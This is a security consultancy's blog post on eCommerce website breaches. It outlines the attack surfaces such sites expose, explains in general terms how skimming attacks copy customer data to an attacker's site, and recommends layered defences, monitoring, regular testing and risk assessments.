contact@prisminfosec.com +44 (0) 1242 652 100 +44 (0) 1242 652 100

LATEST CYBER SECURITY NEWS AND VIEWS

Home > News > Blog Post: eCommerce Websites: Assessing the Risk

Latest news

Blog Post: eCommerce Websites: Assessing the Risk

Posted on by Prism Infosec

eCom

The last year has seen a significant rise in the quantity and impact of attacks on eCommerce (eCom) websites which has cumulatively resulted in the exposure of millions of personal data and, in some cases, card holder data records.

In many cases, relatively simple attacks have been used to compromise eCom applications despite the best efforts of Information Security staff and standards bodies such as the PCI Security Standards Council (SSC). The potential impacts of data breaches include class action lawsuits, brand/reputational damage, fines from regulators such as the Information Commissioner’s Office (ICO) and card scheme fines from Mastercard and Visa.

Looking further into the recent breaches, there is no doubt that firms such as British Airways, Ticketmaster and Quora will have invested significantly in security and compliance. So where did it all go wrong? Are the standards not strong enough, or have the threats increased in sophistication? Why are breaches which affect millions of people so common?

What can organisations do to ensure that they minimise the risk of a successful eCom attack?

After investigating security across many eCom sites, it is apparent that gaps really do exist in many cases. One problem is that there are so many different ways to attack an eCom site, for example:

  • The underlying platform or environment hosting the eCom application;
  • Libraries, packages or dependencies used by the application;
  • The core web application functionality itself;
  • Network security;
  • Configuration settings across all systems and applications;
  • Remote access and management of the environment, including third parties; and
  • The Content Management System (CMS)

Many organisations only defend against a sub-set of these attack points or, in some cases, mistakenly believe that one or more contracted third parties is covering certain areas when this may not actually be the case.

Should an attacker gain unauthorised access to an underlying server involved in the delivery of a web site or the CMS application, then it can be straightforward to modify pages and code associated with critical pages such that information entered by a customer is duplicated to another web site under the control of the attacker. 

The issue associated with this particular attack is that the data (sensitive details such as personal data or credit card data) is not necessarily stored on the compromised server itself, but is nevertheless duplicated to a second malicious web site controlled by the attacker. The eCom site will appear to continue to process transactions ‘normally’ and so the attack can remain undetected for some time, harvesting many thousands of stolen records over a period of weeks or months.

This means that it is vitally important to ensure that access to the eCom servers and associated management systems are strongly protected, both from internal and external attackers. Additionally, detection of unexpected changes to core code and anomalous calls in client transactions are all measures that could be used to detect and prevent the success of such an attack.

Prevention

An online web application associated with the delivery of sales transactions can minimise the risk of a successful attack using effective eCom security management, such as:

  • Prevention of attacks with defence-in-depth (multi-layer security)
  • Detection and alerting of anomalies in eCom operation
  • Fast response to attacks to minimise the risk to the business

Regular testing and scanning of the eCom site is an essential basic, should be frequently conducted, with anomalies remediated as a priority – after all, attackers are testing and scanning all eCom sites across the Internet continuously.

A challenge mentality should be present in the teams managing the site’s infrastructure, code (whether bespoke, off the shelf eCom software / cloud service or a hybrid of the two) and cyber security. This is preferable to considering penetration testing and vulnerability scanning as “tick box exercises” – even issues rated as low risk should be reviewed and managed as part of an effective risk management regime. 

It is also recommended to conduct regular focused eCom risk assessments on new or existing sites, or when changing underlying application frameworks or adding new features such as voucher codes or customer product reviews.

An effective eCom risk assessment should cover:

  • Platform/technologies in use (hosting, network and software)
  • Effective management of any third parties
  • Resilience of eCom platform
  • Sensitive data stored, processed or transmitted, compliance obligations
  • eCom code and content development, testing and deployment
  • Logging/monitoring, testing and assurance

Relying on just baseline security practices such as patching and network security is quite clearly not the only requirement to ensure adequate protection of an eCom website, and many different threats and attacks need to be considered.

An eCom risk assessment, combined with regular testing and scanning, will ensure that the many risks of an eCom breach are understood, properly managed and mitigated as far as possible.

FILTER RESULTS

Latest tweets

Retweet on Twitter Prism Infosec Retweeted
Innovation News Network @innonewsnetwork ·
25 Mar

Phil Robinson, Principal Consultant at @prisminfosec, details how addressing cyber maturity can improve a business’ cybersecurity strategy.
#CyberMaturity #Cybersecurity

Click the link below to discover more⬇️

Retweet on Twitter Prism Infosec Retweeted
Cyber Essentials @cyberessentials ·
20 Feb

Congratulations to the following companies who are now certified to #CyberEssentials via our great Certification Bodies: Atlantic Limited via @prisminfosec and Ashbrook Research & Consultancy Ltd via @sericsystems

Sign up to our newsletter

  • Fields marked with an * are mandatory

  • This field is for validation purposes and should be left unchanged.